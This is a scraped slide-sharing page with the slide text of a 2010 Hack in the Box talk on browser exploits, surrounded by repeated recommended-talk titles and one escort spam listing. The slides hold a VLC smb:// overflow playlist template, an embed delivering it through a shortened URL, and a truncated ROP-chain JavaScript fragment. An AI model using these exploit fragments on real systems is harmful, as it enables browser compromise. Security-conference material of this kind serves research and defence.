Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 

Último (20)

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 

W.E.B. 2010 - Web, Exploits, Browsers

  • 1. W.E.B. 2010Web . Exploits . Browsers Saumil Shah Hack in the Box - Kuala Lumpur 2010
  • 2. # who am i Saumil Shah, CEO Net-square LinkedIn: saumilshah
  • 3.
  • 4. LOOK AT ALL THE COOL STUFF!! 5
  • 6. 5 With JIT!Fights DEP, ASLR!
  • 7. 5 Worldwide coverage, Hides your tracks.
  • 8. 5 ...as never seen before!
  • 9. 5 GUARANTEED!! Fresh new bugs, Present on most computers
  • 10.
  • 11.
  • 12.
  • 13. I can haz sandbox I Also Can!
  • 14. IM IN UR BASE KILLING UR D00DZ Sploit Time!
  • 15. See no EVAL CVE 2010-2883 (0+1)day exploit Obfuscated Javascript decoded without using eval, document.write, etc.
  • 16.
  • 17. Who you gonna call?
  • 18. howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN.
  • 19. howstuffworks - Anti Virus These are not the sploitz you're looking for.
  • 20. 0-day to the Face! "To get our new signature files you need a valid support plan."
  • 21. ...and keep on patching
  • 22.
  • 23. W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  • 24.
  • 25. Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets MIND THE GAP
  • 27. Making the impossible possible smb:// mrl buffer overflow
  • 28. VLC smb:// overflow - playlist <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist>
  • 29. ...just add bit.ly smb:// mrl buffer overflow
  • 30.
  • 32. VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> I'm in ur browser.... ...blowin up ur g00dz pwn
  • 33.
  • 34. I'm an evil Javascript I'm an innocent image
  • 35. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="" EET - Exploit Enabler Technology <canvas>
  • 36. The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps
  • 37. shoutz... L33tdawg, Amy, cbelinda KUL volunteerz NL crew Paul Vixie
  • 38. kthxbai www.net-square.com secure . automate . innovate

Notas del editor

  1. Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  2. Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  3. Flash Sprays
  4. URL Shorteners, can host an entire exploit.
  5. 800+ Javascript events, Video, and more
  6. Sandboxing isn&apos;t the solution.